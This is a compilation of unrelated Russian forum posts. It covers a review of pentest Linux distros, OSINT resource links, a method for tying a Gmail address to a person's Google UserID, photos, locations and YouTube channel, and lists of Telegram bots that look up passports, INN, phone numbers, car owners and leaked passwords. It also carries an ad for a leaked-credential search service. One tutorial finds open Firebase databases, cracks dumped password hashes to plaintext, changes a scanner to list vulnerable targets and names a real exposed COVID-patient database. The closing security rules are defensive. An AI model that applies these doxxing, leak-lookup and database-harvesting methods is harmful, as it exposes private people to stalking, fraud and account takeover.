BlackArch не стесняется использовать Wine для запуска некоторых «неродных» приложений. В качестве примера — mft2csv (на скриншоте выше), который парсит MFT файловой системы NTFS для дальнейшего анализа. В наличии имеется и Java (OpenJDK 14.0.1).
![MSF тоже на месте](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13987%2Fblackarchmsf.jpg&hash=a53f866b7cfb591210e11e19e600b428)
MSF тоже на месте
Терминал, как и в целом графическая оболочка системы, выглядит уныло, зато
версии софта актуальные. С одной стороны, кажется, что хотели сделать как в
кино про хакеров, с другой — система все же вполне юзабельна, хотя и требует
серьезных навыков.
В общем, если ты не готов пробираться через минное поле конфигов, аргументов при запуске софта, гугленья на каждый чих и прочие прелести этого мультитула — смотри в сторону Kali и Parrot, там хоть что-то можно сделать без настольного справочника. К новичкам BlackArch более чем недружелюбна. И, ясен пень, не вздумай ставить ее как основную.
BackBox
И под конец — еще один дистрибутив, стоящий особняком от остальных. BackBox не претендует на звание лучшего хакерского мультитула, зато он как нельзя лучше подходит для повседневного использования. Графическая оболочка тут Xfce, что минимизирует потребление системных ресурсов. С сайта доступны для скачивания два варианта — ISO и Torrent. Образа для виртуальных машин нет.
BackBox основан на Ubuntu (точнее, Xubuntu), что делает удобным его использование как домашней ОС, к тому же по Ubuntu доступна куча документации и форумов с ответами на распространенные вопросы. Тут нет каких-то твиков ядра, так что никакие махинации ничего не испортят. Такие особенности делают этот дистр прекрасным выбором для начинающего пентестера.
![Меню BackBox Linux 7](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13988%2Fbbmenu.jpg&hash=a2599f1d0aad3ec7536b6055b5a27957)
Меню BackBox Linux 7
Инструментов из коробки поставляется не так и много, всего около 200 штук, но для первых шагов в ИБ вполне достаточно. В остальном BackBox — это просто Xubuntu со всеми ее ~~багами~~ фичами и функциями.
Важный плюс, на который я не могу не обратить внимание, — все инструменты очень удобно сгруппированы в меню. Даже если ты не знаешь ни одного инструмента, например, для атак на Wi-Fi, ты с легкостью найдешь их.
Сказать больше особо нечего, просто пользуйся на здоровье.
Сводная таблица
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13992%2Ftable.jpg&hash=0b1667656288c4bb60bf6db2bab7b1a9)
Выводы
Тут должна была быть лекция, что недопустимо использовать большинство из этих
дистрибутивов как основную ОС, но ее не будет. Пробуй разные дистры, выбирай
тот, что ближе твоему сердцу, и желаем тебе удачи.
авторы @ Hackcat aka hackcatdev & @ kass-gameson
хакер.ру
Небольшая подборка интересных кейсов по OSINT с решениями.
Тем, кто не шибко знаком с этим хозяйством - будет очень интересно. Тем, кто
немного вкурсе - можно освежить знания и даже узнать что-то новое для себя.
Сборник будем дополнять, на полноту не претендуем)
ОСТОРОЖНО! ССЫЛКИ на сторонние
ресурсы!
-Как найти место по фотографии
И сгонять за заброшенный особняк
Spoiler: 1
http://vas3k.ru/blog/388/
-Как найти аккаунты и личные данные человека в сети
Инструменты для деанона по открытым источникам
Spoiler: 1
http://vas3k.ru/blog/389/
-Пятиминутный кейс по OSINT №1
Spoiler: 1
https://telegra.ph/Pyatiminutnyj-kejs-po-OSINT-1-01-16
-Пятиминутный кейс по OSINT №2
Spoiler: 1
https://telegra.ph/Pyatiminutnyj-kejs-po-OSINT-2-01-16
-Пятиминутный кейс по OSINT №3
Spoiler: 1
https://telegra.ph/Pyatiminutnyj-kejs-po-OSINT-3-03-12
-Пробив Евгения Вольнова - украинского пранкера
Spoiler: 1
http://evgeniy-volnov.biz/
-Прохождение конкурса “Конкурентая разведка“ на PHDays III 2013-го года
Spoiler: 1
https://habr.com/company/pt/blog/184450/
-Разбор заданий конкурса «Конкурентная разведка» на PHDays IV 2014-го года
Spoiler: 1
https://habr.com/company/pt/blog/225353/
-Разбор заданий конкурса «Конкурентная разведка» на PHDays V 2015-го года
Spoiler: 1
https://habr.com/company/pt/blog/261459/
-Конкурентная разведка на PHDays: шпионим через Интернет вещей, 2017-ый год
Spoiler: 1
https://www.phdays.com/ru/press/news/konkurentnaya-razvedka-na-phdays- shpionim-cherez-internet-veschej/
-ICO и безопасность: разбор конкурса «Конкурентная разведка» на PHDays
Spoiler: 1
https://habr.com/company/pt/blog/413203/
-Деанонимизация для домохозяек
Spoiler: 1
https://xakep.ru/2014/03/15/62206/
-Использование методов онлайн-поиска данных для ответов на вопросы «Кто, где и когда» в отношении той или иной личности
Spoiler: 1
http://verificationhandbook.com/book2_ru/chapter2.php
-Инструменты для онлайн-поиска и техники расследований
Spoiler: 1
http://verificationhandbook.com/book2_ru/chapter3.php
-Использование пользовательского контента для расследований нарушений прав человека и военных преступлений
Spoiler: 1
http://verificationhandbook.com/book2_ru/chapter7.php
-Исследование фотографий. Практический пример.
Установление адреса по фотографиям интерьера и фасада объекта
Spoiler: 1
http://ci-razvedka.ru/Issledovanie-foto.html
-Немного о том, как можно манипулировать метаданными фотографии
Spoiler: 1
https://al-kuzin.livejournal.com/197505.html
Статья о том, как по адресу электронной почты Gmail подтянуть всевозможную информацию о владельце почты с остальных Google сервисов.
Множество людей, имеющих учетную запись Google, могут не догадываться о том, что Google использует различные номера, имена, сигнатуры и прочие бессмысленные (на первый взгляд) строки для идентификации учетных записей. В частности о том, что все они доступны для просмотра другими пользователями, и между ними можно выявить связь для дальнейшей разведки.
Самый простой пример - ныне почивший Google+. Идентификатор аккаунта (Google UserID), подключенный к приложениям Google, таким как Google Maps или Google Photos, можно было увидеть напрямую, открыв страницу человека или его фотоальбом.
Поиск и сбор Google UserIDs
Самый простой и быстрый способ собрать множество Google UserID для дальнейшей
разведки - это использование Google Contacts. Для этого необходимо
сформировать CSV-файл с именами и адресами электронных почт интересующих нас
пользователей, а затем импортировать его.
После этого, мы открываем инструменты разработчика в браузере (F12),
переключаемся на вкладку "Network" и перезагружаем страницу для того, чтобы
получить «сырой» ответ от сервера, содержащий сведения о только что
добавленных контактах. Среди множества отправленных запросов, нас интересует
лишь четыре основных - к «contacts.google.com», с конечной точкой
«batchexecute».
Нажав на последний, мы увидим длинную строку с данными, которые обрабатываются в дальнейшем нашим браузером, согласно Javascript-сценариям.
Это именно то, что нам нужно, но работать в браузере с этими данными будет не удобно, учитывая, что у нас 624 контакта вкупе с кучей мусора. Давайте вытащим эту информацию и сохраним в текстовом файле, для дальнейшей обработки. Для этого щелкните ПКМ на строке с запросом и выберите «Copy as cURL (POSIX)».
Вставьте готовую команду в терминал и направьте вывод в текстовый файл.
Нужные нам идентификаторы пользователей можно найти, выполнив поиск 21-значных десятичных чисел, начинающихся с цифр «10» или с «11». Это проще всего сделать, используя регулярные выражения.
Следует учесть, что не у каждого аккаунта можно получить Google UserID при
помощи данного метода. После проделанных манипуляций, я обнаружил, что из 624
ранее добавленных контактов, я смог извлечь лишь 130 идентификаторов. Это
примерно 20% всех пользователей, что не есть хорошо.
Помимо этого способа, как и следовало ожидать, данные идентификаторы также можно найти вручную, в исходном коде страницы. Для этого вы переходите в список контактов, открываете интересующий вас контакт и, используя инструмент разработчика с вкладкой «Инспектор» (Firefox) или «Элементы» (Chrome), выполняете поиск: "data-sourceid". Там будет два значения, второе - как раз то, что нам нужно.
Чтобы быстро собрать весь список Google UserID этим способом, если вы не
хотите писать скрипты, хождение по страницам и парсинг можно автоматизировать
при помощи расширения Data Miner. В нем необходимо
будет создать рецепт для поиска следующего HTML-фрагмента (удивительно, но
имена классов вроде бы не меняются):
Code:Copy to clipboard
<div class="NVFbjd LAORIe "data-sourceid="
Предупреждение
Опять же, при двух описанных выше способах, не все контакты содержали
идентификаторы, несмотря на то, что они точно есть у каждой учетной записи.
Единственный надежный способ получить Google UserID у остальных контактов -
использование Google API. Но так как в данный момент у меня нету времени для
того, чтобы написать скрипты для автоматизации, я буду рад, если другие люди
займутся этим. Но, прежде чем это сделать, давайте просто взглянем на сам API.
Google API
Если Google UserID не был получен в результате дампа контактов, но вы
действительно заинтересованы в изучении конкретного почтового адреса, есть
другой способ получения желанного идентификатора. Для этого мы рассмотрим
Google People API, который дает возможность извлекать всевозможную известную
информацию из ваших контактов. Адреса, имена, номера телефонов и любую другую
личную информацию, которую вы самостоятельно указали контактам, возможно
извлечь. Но сейчас нас интересует поле «Metadata», поскольку именно оно
содержит Google UserID.
В качестве resourceName (это один из обязательных параметров, при выполнении запросов к данному API) будет выступать еще один внутренний идентификатор, который я, для удобства, назову contactID. Его можно найти в текстовом файле, который мы создали ранее, или просто открыв профиль нужного контакта и посмотрев запросы, отправленные на сервер. В одном из них, вы сможете найти его - он начинается с буквы «c» и содержит около 19 цифр.
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F911%2F1%2AKkBu-
uHETKE-tVIkjv9KuQ.png&hash=2247fa0b5ece24fcebed9623999b9cf9)
Этой информации нам будет достаточно. Теперь мы заходим в Google
API и вводим
полученные данные для выполнения запроса.
Не забываем перед этим создать проект, предоставить ему соответствующие права на использование определенных функций и так далее.
После того, как мы заполучили Google UserID, есть три пути, где мы можем сразу это использовать: найти возможные фотоальбомы пользователя, найти его отзывы или места, которые он посещал, и последнее - найти учетную запись на YouTube. Давайте взглянем на это!
Фотоальбомы
Чтобы найти фотоальбом пользователя, нам просто нужно подставить его Google
UserID в следующий URL:
Code:Copy to clipboard
https://get.google.com/albumarchive/{userID}
Не у всех есть такой фотоальбом. Но если он есть, зачастую в нем можно найти много интересного, как это было в моем случае, смотрите скриншот ниже. Зная российское законодательство, я бы побоялся публиковать свастоны (осуждаю).
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F1903%2F1%2A7PWAHGiGOEnRzuBHJpt- EA.png&hash=c6d174ae9d1a550e07216471858921dc)
И самое приятное то, что иногда в альбоме можно найти фотографии с указанным местоположением на Google Maps! Вот одна из фотографий, полученных из одного фотоальбома:
А вот точные координаты:
Google Maps
Принцип аналогичен предыдущему, просто подставляем идентификатор в ссылку
ниже:
Code:Copy to clipboard
https://www.google.com/maps/contrib/{userID}
После того, как мы откроем страницу, по умолчанию отобразятся фотографии пользователя, с информацией о местоположении. Но можно и открыть его Reviews. Удивительно, что имея лишь адрес электронной почты, можно узнать чье-то настоящее имя. Если этот "кто - то", конечно же, не использует никнейм.
Youtube-аккаунт
Мало кто знает, но зачастую можно найти YouTube-канал пользователя, при
наличие его электронный почты. Пользователь вправе создать несколько каналов,
привязанных к одной электронной почте, но, по умолчанию, у него есть одна
стандартная учетка на YouTube, носящая имя аккаунта:
Code:Copy to clipboard
https://www.youtube.com/feeds/videos.xml?user={accountName}
В результате, мы получим RSS-страницу с информацией о канале. Google UserID тут бесполезен, однако мы можем подставить в качестве accountName ту часть Email-адреса, которая идет перед "@".
Для проверки, я выбрал случайного пользователя с никнеймом «test» (у которого, возможно, электронная почта - test@gmail.com). И нашел Youtube-канал, который ему принадлежит.
Мне стало интересно и я написал простенький скрипт, который подставлял
никнеймы из большого списка с 624 Email-ами в тот самый URL. В результате, я
обнаружил 45 Youtube-каналов с таким же именем, как у почты.
Помимо этого, когда речь заходит о Youtube-аккаунтах, существует еще несколько идентификаторов. Прежде всего, самый очевидный - тот, который мы видим в адресной строке, когда заходим на канал.
Code:Copy to clipboard
https://www.youtube.com/channel/UCAiaFvFFZOwlU8Sw8S0dunQ
Второй идентификатор - название канала (которое можно изменять в настройках). В данном примере это "tipsbmx".
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F466%2F1%2A0eWlPoHcQZkh1cFNl- ptwQ.png&hash=76c7433e0afd087414e367f8bdd2a72c)
В исходном коде страницы можно обнаружить и стандартное имя пользователя. Для этого, мы ищем один из параметров: "ownerProfileUrl" или "vanityChannelUrl":
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F512%2F1%2Aj- QazcsMTajwppz5mbErKA.png&hash=c6bdf8ecf873e45e24d4b96dbee8ce0e)
Помимо этого, можно найти и тот самый Google UserID, который я упоминал выше. Для этого, мы ищем в исходном коде «plus.google.com»:
В конечном итоге, мы имеем целых 4 идентификатора:
Google Drive
В Google Drive также существует возможность получить некоторую информацию о
владельце загруженного файла. В одном из кейсов, связанным с одним
вирусописателей, фигурировала следующая ссылка:
Code:Copy to clipboard
https://drive.google.com/drive/folders/1_YoL0sjVfyXsxa1hREgpcTrQaYHgtPWk
Когда мы её открываем, мы видим имя, адрес электронной почты и сам файл. На первый взгляд, это вся информация, которая нам доступна.
Но внутри исходного кода страницы есть возможность найти наш любимый Google
UserID.
Как и ранее, нам следует искать строку из 21 символа, которая начинается с 10 или 11. Чтобы упростить поиск, добавьте перед этими символами hex код двойных кавычек, который равен \x22. В итоге, ищем:
\x2210
\x2211
Ну а после этого следуют уже ранее изученные способы разведки. В нашем случае, в Google Reviews попался реальный отзыв об одном из ресторанов с этого фейкового аккаунта.
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F1123%2F1%2A_xr- jrPGy86gpoKPgEkP5g.png&hash=af00b4e2afdbbbf070fd276611b3c3a3)
Следует учесть, что для получения Google UserID вышеупомянутым способом, необходимо авторизоваться в Google. Если вы хотите остаться анонимным или по какой - то причине не можете зайти в свой аккаунт, есть еще один способ узнать, кто загрузил файл. Для этого открываем вкладку "Network", в инструментах отладки, затем саму страницу с файлом, и фильтруем запросы, содержащие "permission". Такой будет всего один и он будет содержать
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F1316%2F1%2AG- OCWCUvzLOxeBRmG26LIw.png&hash=380ec27154e7a552e87022489d0d8bd2)
Вывод
Google присваивает множество различных идентификаторов пользователям, которые
лежат на поверхности и могут быть использованы исследователями. При этом, весь
процесс поиска и сопоставления результатов можно автоматизировать. Я не
профессиональный разработчик, но я люблю исследовать код и узнавать о том, как
все это работает, поэтому я могу законно использовать полученную информацию в
своих собственных интересах.
[Источник](https://medium.com/week-in-osint/getting-a-grasp-on-
googleids-77a8ab707e43)
Перевод: @cybred
Вдруг кому интересно:
](https://www.hse.ru/ma/intelligence?fbclid=IwAR1L_FwP6Mfv6fc4xB2FtgdYP87kbnUJVBwG273dzDEhDKpOvd_YU9CeqPM)
Программа подготовит специалистов в области информационно-аналитического обеспечения комплексной безопасности бизнеса. Акцент сделан на изучении функции деловой разведки как неотъемлемой составной части менеджмента организации
www.hse.ru
- Список ботов по OSINT(самый полный)
- /threads/101878/
- Малоизвестные боты для "пробива" -
/threads/66630/
- В каких канал и чатах состоит TG юзер -
/threads/67689/
- Подборка чатов, каналов и форумов по OSINT
- /threads/67483/
- Телеграм боты по пробиву персональных
данных - /threads/94219/
- Боты или сервисы для пробива гос. номеров машин
СНГ/РФ - /threads/93783/
- Полезные OSINT Telegram боты (OSINT на
Telegram) - /threads/30883/
- Помогите определить бот? - /threads/88949/
Делюсь своей подборкой по пробиву в ТГ
@Smart_SearchBot - оч информативный бот, много баз, платный, есть бесплатный
тестовый период (раньше был 2 недели)
@get_contact - 5 запросов телефонов в сутки
@AntiParkonbot - по гос номеру имя и номер телефона владельца авто
@deanonym_bot - помогает узнать id собеседника в ТГ
@get_caller_bot - поиск по утечкам., список баз представлен в описании
@getGmail_Bot - бот находит привязанный к любому email GMAIL
@mailsearchbot - утечки email
@userinfobot - еще один ТГ анонимайзер
@HowToFind_Ru_bot - ассистент в OSINT. подскажет методы и ресурсы поиска
@KRIncognito - нормальные были парни, жаль затухли. может оживут еще
Облачная база данных — штука удобная: считай, вся работа по деплою и настройке сервера за тебя уже сделана, осталось только пользоваться! Админов это расслабляет настолько, что такие базы часто остаются незащищенными и ищутся с помощью поисковиков. Один нюанс — этим поисковиком не может быть Google!
Firebase — это облачная платформа, которую разработала компания Envolve в 2011 году. Изначально это была база данных для приложений‑чатов, но позже ее полюбили разработчики многопользовательских онлайновых игр. Это подвигло основателей разделить Firebase на две части: модуль чата и модуль игрового фреймворка.
Два года спустя, в 2014 году, Google приобрела Firebase и продолжила развивать. Программные интерфейсы для этой базы данных есть для множества платформ и языков программирования.
С технической точки зрения Firebase — крутая и удобная штука. Кажется, что ничего докручивать и допиливать здесь не нужно. Но безопасная настройка облачной базе таки нужна, и многие владельцы об этом забывают, чересчур расслабившись. Настолько, что забывают о простейшей вещи — аутентификации.
Получается, что в интернете масса не закрытых паролем баз данных, а это легкая добыча для злоумышленников. Только вот взять и нагуглить их не получится, потому что в Google решили, что эту проблему можно решить, просто исключив эти базы из поисковой выдачи. Ловко! Но крайне ненадежно.
![Поиск Google по запросу
Firebase](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18948%2F1.png&hash=a1eccea272f7e72879dd177f1167d402)Поиск
Google по запросу Firebase
Ничто не мешает нам воспользоваться другим поисковиком — например,
Bing или DuckDuckGo. Они
выдают уже намного больше полезной информации.
![Поисковый запрос в Bing и
DuckDuckGo](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18958%2F2.jpg&hash=8e8a6561b19b92262a0b4631ca815a6f)
Поисковый запрос в Bing и DuckDuckGo
Что можно сделать дальше, после того как найдены домены с уязвимыми базами?
Открываем любую ссылку — например, https://hacker- news.firebaseio.com/v0/topstories.json
. Информация о ней бесполезна, но если
убрать из ссылки название таблицы topstories и оставить только .json, то можно
проверить, защищена база или нет. В этом случае результат выглядит вот так:
Code:Copy to clipboard
{
"error" : "Permission denied"
}
Все верно, лично я бы знатно удивился, если бы владельцы этого сайта допустили
настолько вопиющую оплошность. Но некоторые ее таки допускают. Минут десять
перебора ссылок, и поиск увенчается успехом.
![Найденная открытая база данных](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18950%2F3.PNG&hash=f7b11ce02497510d45f7bd6d732e9ce0)
Найденная открытая база данных
Я нашел что‑то более интересное — учетки с хешами паролей. Выбрать их из файла несложно простым скриптом на Python или утилитой jq.
При помощи HashID определяем тип хешей (это был MD5) и загоняем в hashcat. Если нет достаточно мощного железа, можно воспользоваться онлайновым сервисом — тулза FindMyHash автоматически их подбирает. Все эти утилиты предустановлены в Kali Linux.
![Взлом пароля через FindMyHash](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18951%2F4.PNG&hash=7934c728126db656c555732f51d947a0)
Взлом пароля через FindMyHash
Ждем десять минут, и перед нами логины и пароли в открытом виде.
![Найденная база с открытыми паролями в открытом
виде](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18959%2F5.jpg&hash=61d79f143c3fa3067da896dec5f87b4f)
Найденная база с открытыми паролями в открытом виде
Сидеть, менять поисковики и перебирать все URL вручную очень нудно. Слишком часто видишь «error : Permission denied». Значит, пора автоматизировать! Программировать, правда, не потребуется, потому что это уже сделали до нас. Возьмем, к примеру, скрипт за авторством Францеска Эрреры.
Скрипт сам подбирает URL и ищет уязвимые базы данных.
Качаем его и устанавливаем зависимости:
Code:Copy to clipboard
git clone https://github.com/Turr0n/firebase.git
cd firebase
pip install -r requirements.txt
И запускаем:
Code:Copy to clipboard
python3 firebase.py -p 4 -c 150 –dnsdumpster
Ключи:
Да, скрипт умеет генерировать ссылки самостоятельно. Точнее, делает это не сам, а обращается за помощью к утилите DNSdumpster.
![Результат работы скрипта](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18953%2F6.png&hash=6853e8f3551c5713e6f5205341f59f0d)
Результат работы скрипта
По результату видно, что из найденных баз:
Можно скормить скрипту и свой список. В нем должны быть только поддомены третьего уровня. Например, ты делаешь вот такой входной список:
Code:Copy to clipboard
xxx
yyy
zzz
Тогда скрипт проверит вот эти URL:
Code:Copy to clipboard
https://xxx.firebaseio.com
https://yyy.firebaseio.com
https://zzz.firebaseio.com
Чтобы получить наиболее эффективный список, можно воспользоваться скриптом sublist3r, который использует разные техники поиска и OSINT, чтобы подобрать наиболее правдоподобные варианты.
Запускаем:
Code:Copy to clipboard
python3 sublist3r.py -d firebaseio.com
И на выходе получаем около 650 доменов. Работает очень быстро.
![Поиск доменов программой
sublist3r](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18954%2F7.png&hash=2d41392ebac7abdd6cd7c6e7b6511b50)
Поиск доменов программой sublist3r
Еще одна утилита для генерации доменов — subbrute. Она выдала мне в районе 100 поддоменов, но работала 30–40 минут.
![Поиск поддоменов программой
subbrute](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18955%2F8.png&hash=9896254525d566740695c2ee677497d3)
Поиск поддоменов программой subbrute
[Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain- finder), на который я возлагал большие надежды, выдал всего семь доменов. К слову, и сам сервис выдал немного — 25 урлов.
Все перечисленные утилиты не входят в состав дистрибутива Kali Linux, их пришлось качать отдельно.
Из онлайновых сервисов можно воспользоваться nmmapper, DNSdumpster, [Pentest-Tools](https://pentest- tools.com/information-gathering/find-subdomains-of-domain).
Если все еще мало, можно задействовать знания о том, что настройки интеграции происходят в файле google-services.json, и поискать в гите запросом site:github.com google-services.json. Этот вариант идет вразрез со словом «автоматизация», зато можно докопаться до уникальных баз.
Теперь мы вооружены добротным набором урлов и знаем, что какие‑то из них могут быть уязвимы. Даже можем запустить скрипт и проверить количество неверно настроенных баз из нашего списка. Но цель в таких случаях — не собрать статистику, а получить уязвимые цели. Поэтому откроем код скрипта и слегка поправим.
Посмотри вот на этот кусок кода:
Code:Copy to clipboard
urls = set()
with open(args_.list, 'r') as f:
[urls.add('https://{}.firebaseio.com/.json'.format(line.rstrip())) for line in f]
Из него понятно, как формируется полный адрес. А в конце формируется отчет:
Code:Copy to clipboard
print('404 DBs: {}'.format(l['-2']))
print('Secure DBs: {}'.format(l['-1']))
print('Possible vulnerable DBs: {}'.format(l['0']))
print('Vulnerable DBs: {}'.format(l['1']))
Кусок кода с проверкой я приводить не буду. Там нет ничего любопытного, мне нужно было найти само присвоение. И вот оно:
Code:Copy to clipboard
with open(args_.fn, 'w') as f:
json.dump(loot, f)
l = {'1':0, '0':0, '-1':0, '-2':0}
for result in loot:
l[str(result['status'])] += 1
Вот в этом месте я создаю свой массив по статусу 1. Так как я еще не понимаю, чем его заполнять, записываю все подряд. Получилось примерно следующее:
Code:Copy to clipboard
l = {'1':0, '0':0, '-1':0, '-2':0}
Vulnerable = []
for result in loot:
l[str(result['status'])] += 1
if str(result['status']) == '1':
Vulnerable.append(result)
И в конце добавляю вывод результата в консоль:
Code:Copy to clipboard
print('404 DBs: {}'.format(l['-2']))
print('Secure DBs: {}'.format(l['-1']))
print('Possible vulnerable DBs: {}'.format(l['0']))
print('Vulnerable DBs: {}'.format(l['1']))
print(Vulnerable)
После запуска вижу такую картину.
![Работа программы после
вмешательства](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18956%2F9.png&hash=0fc2c22ee4490593decb999bbc6e7c3b)
Работа программы после вмешательства
Мне высыпалось все, что хранилось в базах. Зато теперь я знаю, что записывать в Vulnerable. Правим код, как надо:
Code:Copy to clipboard
l = {'1':0, '0':0, '-1':0, '-2':0}
Vulnerable = []
for result in loot:
l[str(result['status'])] += 1
if str(result['status']) == '1':
Vulnerable.append(result['url'])
...
print('404 DBs: {}'.format(l['-2']))
print('Secure DBs: {}'.format(l['-1']))
print('Possible vulnerable DBs: {}'.format(l['0']))
print('Vulnerable DBs: {}'.format(l['1']))
print(Vulnerable)
На этот раз при запуске видим то, что было нужно, — список уязвимых баз.
![Работа скрипта после хирургического
вмешательства](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0e40e7f881980c1c888016819c445cda%2F18957%2F10.png&hash=5974bf3bc18af91650311465fec216fa)Работа
скрипта после хирургического вмешательства
Особенно меня заинтересовала вот эта ссылка:
https://covid-19-tracker-e76ca.firebaseio.com/.json
. В Малайзии так спешили
отслеживать перемещения больных ковидом, что не поставили пароль на базу
данных с их координатами...
Назвать эту проблему уязвимостью — некоторое преувеличение. Все сводится к тому, что Google позволяет открыть доступ к содержимому базы всем неавторизованным пользователям, и некоторые разработчики так и поступают.
Поэтому, чтобы защититься, достаточно прописать политики безопасности Firebase. Google предлагает придерживаться следующих правил.
Даже во время разработки (на тесте и на stage) не стоит открывать доступ ко всем данным в Firebase неавторизованным пользователям, но есть возможность открыть их при авторизации:
Code:Copy to clipboard
service cloud.firestore {
match /databases/{database}/documents {
match /{document=**} {
allow read, write: if request.auth != null;
}
}
}
Это правило необходимо, когда нескольким пользователям нужно работать с одним контентом.
Следующее правило дает доступ к данным только владельцам этих данных. Остальные пользователи не смогут их видеть или обрабатывать:
Code:Copy to clipboard
service cloud.firestore {
match /databases/{database}/documents {
// Allow only authenticated content owners access
match /some_collection/{userId}/{documents=**} {
allow read, write: if request.auth != null && request.auth.uid == userId
}
}
}
И третье правило устанавливает доступ на чтение некоторых данных некоторым пользователям, но редактирование — только его владельцу:
Code:Copy to clipboard
service cloud.firestore {
match /databases/{database}/documents {
// For attribute-based access control, Check a boolean `admin` attribute
allow write: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.admin == true;
allow read: true;
// Alterntatively, for role-based access, assign specific roles to users
match /some_collection/{document} {
allow read: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == "Reader"
allow write: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == "Writer"
}
}
}
Более подробные сведения о безопасности аутентификации и контроле доступа можно найти в документации Firebase.
Итак, мы рассмотрели, как происходит утечка данных, разобрались с поиском уязвимых URL, научились автоматизировать процесс и узнали, как избежать этой проблемы.
В документации по безопасности Firebase приведены и сами правила, и разные способы защитить данные. Не стоит ими пренебрегать, перекладывая ответственность на какие‑нибудь гейты или прокси‑серверы. Адрес базы может быть обнаружен.
Автор 8bit
источник хакер.ру
Доброго времени суток форумчане. Час назад мне позвонил человек с незнакомого номера и начал угражать (доогадываюсь кто это но не знаю лично). Прошу помочь мне и подсказать как можно узнать информацию о владельце номера. Заранее благодарю
hello guys.
we are started new project now you can search any domain , email , password ,
port ... in under sec
create account and search in user panel
website : https://findemail.io
telegram news channel :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FPmxBT02b9Kb- zasSSUVkLdIW6i5sOLummSERFC17HiPPUszlQNL6Mo2TLuNsTRg6RZLyllCJOkiQc0K1M_EMoq6dWo_HWXTHOQSVZQYyCD-t5LTqHEkQcz44Gr57NhUuYJen- rZwYLeDwTwqC_cTyzo-tJSj4TXLPQRkMUPTf--IQxw4KH5zKGneSCIP-gRaZdhPU0pl0NOhcWXpd- HbQUT9tnPe5puvRM2rHqg65JKI7RZmjV8grEy277QVPHhU3JBr8-UrWLH0LMEydxhi8nj_sb5np_v17WQ_T44IuuC9U_6z9xyszHZmasjGYjB4fq1PZ1EtKNlMtwoDmS8T9g.jpg&hash=4ce0eb6fa46a23e8bccd1cf843462822&return_error=1)
website : https://findemail.io
t.me
**logs section you are search by domain , username , email
next month we are add search by ( Technology , keyword )**
**Leak Search = You can search on all leak database search by (Domain, Username, ip, phone, and ...)
Domain search = you can extract email from any domain
**
**Выкладываю личную подборку Telegram ботов, которой сам пользуюсь последние полгода. Настоятельно рекомендую использовать виртуальные номера, так как информация о запросах к боту может логироваться. Регистрируйте аккаунт Telegram на любом удобном сервисе на виртуальную сим-карту+ 2FA для защиты от брута. Далее можем начинать осинтить:
Автоматизированный OSINT:**
@EyeGodsBot - лучший платный бот для комплексного пробива
@SearchPerson_bot - один из лучших бесплатных ботов (howtofind аналог)
@Smart_SearchBot - комплексный пробив с широким функционалом
@SovaAppBot - осинтит по Telegram, VK, радиосигналы и прочее
@AngelProbiv_Bot - "Архангел", ФИО, паспорт, ИНН, СНИЛС
@imole_bot - КРОТ, пробивает комплексно (не использовал)
@mvd_fsb_bot - комплексный пробив (широкий список услуг)
@HimeraSearch_bot - проф пробив фио, телефон, почта
@AvinfoBot- проверка данных об авто по госномеру, VIN, номеру ПТС, ФИО
@quick_osint_bot — ищет по телефону, email, госномеру или VIN авто
@Dosie_Bot - составляет досье на человека по Украине (не пользовался)
@info_baza_bot - пробив по Украине (не пользовался)
Точечный OSINT по username/ID в Telegram
@deanonym_bot - пробив username от "Интернет-Розыск" (требует номер)
@anonimov_bot - пробивает username в Telegram
@LinkCreatorBot — бот найдет ID аккаунта создателя ссылки
@usinfobot — найдет ID username
@CheckID_AIDbot — найдет ID username
@username_to_id_bot - история изменения имени аккаунта
@infoleakbot - проверка своего id на утечки
@SangMataInfo_bot — история изменения имени аккаунта
@ShowJsonBot - Бот возвращает json для всех отправляемых сообщений
@maigret_osint_bot– проверка username среди 1366 различных сайтов
@eyeofbeholder_bot— бот подсказывает интересы человека по его аккаунту
Точечный OSINT по группам в Telegram
@telesint_bot — найдет группы в которых состоит пользователь
@creationdatebot — примерная дата создания аккаунта, не работает по ID
@tgscanrobot — найдет группы в которых состоит аккаунт
@list_member_bot — бот для парсинга чатов и не только...
@quant_parserbot — бот для сбора аудитории из чатов
Точечный OSINT по email
(больше инфо смотри в "Автоматизированный OSINT")
@mailsearchbot -поиск пароля по слитым базам
